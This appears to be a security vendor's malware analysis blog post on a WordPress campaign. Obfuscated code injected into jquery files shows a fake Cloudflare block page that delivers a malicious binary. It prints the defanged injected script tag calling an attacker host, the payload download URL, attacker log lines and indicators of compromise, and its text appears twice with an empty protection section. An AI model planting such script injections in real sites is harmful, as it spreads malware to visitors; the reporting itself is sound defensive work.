<iframe src="https://www.googletagmanager.com/ns.html?id=GTM-5HLVVHN" height="0" width="0" style="display:none;visibility:hidden">
Sep 26, 2022 5:40:23 AM
Vitalii Rudnykh
Vitalii Rudnykh
Senior Malware Analyst / Security Researcher

The deceptive Cloudflare block page that signals WordPress infection

deceptive-cloudflare-block-page-that-signals-wp-infection_G
Infection description

On Sep 15, we detected a malicious campaign. It was evident that the attackers we discovered were using phishing techniques to trick users into downloading a malicious binary file. They used a fake message on websites stating that a user has been blocked by Cloudflare. Meanwhile, infected websites getting the message would not necessarily even use Cloudflare services.

image (11)

Nevertheless, once the user clicked on this fake popup, the binary malware was downloaded to their computer. Clicking on "Check the system" button leads to a malicious binary (sha256: fee5d6b401c6b0164da2bb7472bdd9b4914c4725d03b2029687756e21bb24dc9) downloading. Here is the download link revealed:

# https://gitlab[.]com/devang-acespritech/openck/-/raw/main/CloudSt.zip

The archive being downloaded is only 10 MB, but the unpacked binary weighs about 700 MB. It seems evident that the attackers intentionally went for distributing the sizes of packages in such a way that these files will go under the radar and will not be uploaded to numerous online virus scanning services.

Attack vector

In all the cases of infection, we found an identical injection in the website files. It looks like this:

 ./wp-includes/js/jquery/jquery.js
 ./wp-includes/js/jquery/jquery.min.js

The injection is heavily obfuscated, unfortunately, but it can be discovered if one looks for the following pattern:image (12)

This code, after being executed, injects another malicious script into the source code of the page:

<script src="https://gloogletag[.]com/tagged/ajax.js">

The code shown above loads the HTML code of the fake Cloudflare form using the following url:

https://gloogletag[.]com/code/cloudflare.txt

Upon discovering this infection, we went for an investigation. After examining the web server logs, we found out that the hackers used the very same method in all of the registered cases.

For this attack to start, the hacker needs to have access to the compromised WordPress administrator account. After successful authorization, the attacker needs to install the wp-file-manager plugin.

35.184.195.84 - - [15/Sep/2022:08:55:44 -0400] "POST /wp-login.php HTTP/2.0" 302 - "https://victim/wp-login.php" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0"
35.184.195.84 - - [15/Sep/2022:08:55:54 -0400] "POST /wp-admin/admin-ajax.php HTTP/2.0" 200 193 "https://victim/wp-admin/plugin-install.php?s=file+manager&tab=search&type=term" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0"
35.184.195.84 - - [15/Sep/2022:08:56:42 -0400] "POST /wp-admin/admin-ajax.php HTTP/2.0" 200 279 "https://victim/wp-admin/admin.php?page=wp_file_manager" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0"

In all of the cases we registered, the IP address from witch this attack was carried out was the same: 35.184.195.84.

Indicators of Compromise

gloogletag[.]com
35.184.195.84
fee5d6b401c6b0164da2bb7472bdd9b4914c4725d03b2029687756e21bb24dc9

How to protect your website from infection

Please consider following these steps:

 

The Imunify team cares about your infrastructure security. We always strive to keep you up-to-date with all the information necessary to protect your website and make sure that your business runs smoothly at all times. Please don't hesitate to address any questions you have about protecting your website from malicious activity to our Imunify360 support team.

The deceptive Cloudflare block page that signals WordPress infection

Sep 26, 2022 5:40:23 AM
Vitalii Rudnykh Vitalii Rudnykh

deceptive-cloudflare-block-page-that-signals-wp-infection_G
Infection description

On Sep 15, we detected a malicious campaign. It was evident that the attackers we discovered were using phishing techniques to trick users into downloading a malicious binary file. They used a fake message on websites stating that a user has been blocked by Cloudflare. Meanwhile, infected websites getting the message would not necessarily even use Cloudflare services.

image (11)

Nevertheless, once the user clicked on this fake popup, the binary malware was downloaded to their computer. Clicking on "Check the system" button leads to a malicious binary (sha256: fee5d6b401c6b0164da2bb7472bdd9b4914c4725d03b2029687756e21bb24dc9) downloading. Here is the download link revealed:

# https://gitlab[.]com/devang-acespritech/openck/-/raw/main/CloudSt.zip

The archive being downloaded is only 10 MB, but the unpacked binary weighs about 700 MB. It seems evident that the attackers intentionally went for distributing the sizes of packages in such a way that these files will go under the radar and will not be uploaded to numerous online virus scanning services.

Attack vector

In all the cases of infection, we found an identical injection in the website files. It looks like this:

 ./wp-includes/js/jquery/jquery.js
 ./wp-includes/js/jquery/jquery.min.js

The injection is heavily obfuscated, unfortunately, but it can be discovered if one looks for the following pattern:image (12)

This code, after being executed, injects another malicious script into the source code of the page:

<script src="https://gloogletag[.]com/tagged/ajax.js">

The code shown above loads the HTML code of the fake Cloudflare form using the following url:

https://gloogletag[.]com/code/cloudflare.txt

Upon discovering this infection, we went for an investigation. After examining the web server logs, we found out that the hackers used the very same method in all of the registered cases.

For this attack to start, the hacker needs to have access to the compromised WordPress administrator account. After successful authorization, the attacker needs to install the wp-file-manager plugin.

35.184.195.84 - - [15/Sep/2022:08:55:44 -0400] "POST /wp-login.php HTTP/2.0" 302 - "https://victim/wp-login.php" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0"
35.184.195.84 - - [15/Sep/2022:08:55:54 -0400] "POST /wp-admin/admin-ajax.php HTTP/2.0" 200 193 "https://victim/wp-admin/plugin-install.php?s=file+manager&tab=search&type=term" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0"
35.184.195.84 - - [15/Sep/2022:08:56:42 -0400] "POST /wp-admin/admin-ajax.php HTTP/2.0" 200 279 "https://victim/wp-admin/admin.php?page=wp_file_manager" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0"

In all of the cases we registered, the IP address from witch this attack was carried out was the same: 35.184.195.84.

Indicators of Compromise

gloogletag[.]com
35.184.195.84
fee5d6b401c6b0164da2bb7472bdd9b4914c4725d03b2029687756e21bb24dc9

How to protect your website from infection

Please consider following these steps:

 

The Imunify team cares about your infrastructure security. We always strive to keep you up-to-date with all the information necessary to protect your website and make sure that your business runs smoothly at all times. Please don't hesitate to address any questions you have about protecting your website from malicious activity to our Imunify360 support team.
Subscribe to Imunify security Newsletter
aicpa soc
pci-dss
eu gdpr compliant
© All rights reserved. Imunify360 and CloudLinux Backup are the registered trademarks of CloudLinux Inc.